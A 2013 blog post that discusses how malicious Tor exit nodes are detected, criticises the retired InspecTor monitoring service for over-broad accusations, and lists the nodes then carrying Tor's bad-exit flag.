antiTree | posts and projects
posts projects talks contact
Malicious Exit Nodes: Judge Dredd or Anarchy?
posted on Mar 30, 2013
privacy Tor

InspecTor is a .onion page that kept track of bad exit nodes on the network. And it did a pretty good job. It looked for things like:

  • SSL Stripping: Replacing HTTPS links with HTTP
  • JavaScript injection
  • iFrame injection
  • Exit nodes that have no exit policy (black holes)

Those are the easy to quantify bad properties. We can compare the results of connecting to a bad Exit Node and a good one and diff the results. These are some of the grey areas it also tries to look for:

  • Warning about similar nodes in the same netblock
  • Watch for similar named nodes spinning up hundreds of instances
  • Look at the names of the nodes and conclude that they’re bad (e.g. NSAFortMeade)

The worst case scenario for a service like this, is that first, they’re wrong and kick off a perfectly good Exit Node. Second, they make users use custom routes to evade the bad nodes. Doing so means that your network traffic has a fingerprint. “He’s the guy that never users Iranian exits” for example.

And that’s kind of what happened with InspecTor – now celebrating the anniversary of it’s retirement a year ago. He went Judge Dredd on Tor and started making broad conclusions on what nodes were evil. For example, he said that NSAFortMeade is obviously an Exit Node owned by the NSA assumedly to catch the traffic of Americans (because they can’t do that already?). Other conclusions stated that a family of Tor nodes were from Washington DC. One of them was malicious so the conclusion was that it was probably the Government keeping an eye on us.

Tor’s Controls

What does Tor have as a control mechanism if they do somehow come across a bad exit node? The protocol has a “bad-exit” flag in it so that authorities can let Tor users that this Exit-Node should be avoided. That flag is set by The Tor Project admins as far as I know and you have to be blatantly offensive to cause this to happen. Here is the _total_ list  of nodes that are blocked today:

<td width="219">
  agitator.towiski.de [188.40.77.107]
</td>

<td width="147">
  Directory Server
</td>

<td width="150">
  Guard Server
</td>

<td>
  vz14796.eurodir.ru [46.30.42.154]
</td>

<td>
  Exit Server
</td>

<td>
  Guard Server
</td>

<td>
  vz14794.eurodir.ru [46.30.42.152]
</td>

<td>
  Exit Server
</td>

<td>
  Tor 0.2.3.25 on Linux
</td>

<td>
  vz14795.eurodir.ru [46.30.42.153]
</td>

<td>
  Exit Server
</td>

<td>
  Guard Server
</td>
agitator
Unnamed
Unnamed
Unnamed

http://torstatus.blutmagie.de/index.php?SR=FBadExit&SO=Desc

This says that there are four bad nodes (one’s a bad directory server) on the network right now. I think most people would agree that is a bit low. You can take a look at this link for a complete list of the nodes they’ve blocked in the past. You should notice that a bad-exit flag doesn’t kick them off the network, it just tells the client to never use them as an exit. So these nodes can stay online as long as they want but they’ll never be used.

The Point

The point is not to just say everything sucks. How Tor isn’t doing a good job at monitoring for Exit Nodes or how InspecTor was doing too good of a job for it’s own good. It’s to highlight the real-world problem in Tor. Unlike the sexy theoretical attacks we like to wrap our heads around like global adversaries correlating your traffic back to an individual IP by statistically analyzing your web history patterns, the most likely thing to happen to you is that some douche nuckle is running dsniff and ulogd. And the point is also to highlight a need for a replacement of Snakes On A Tor. You can tell by it’s name, it’s a bit outdated. That is something actively being worked on but it may be a while before something reliable comes out of it.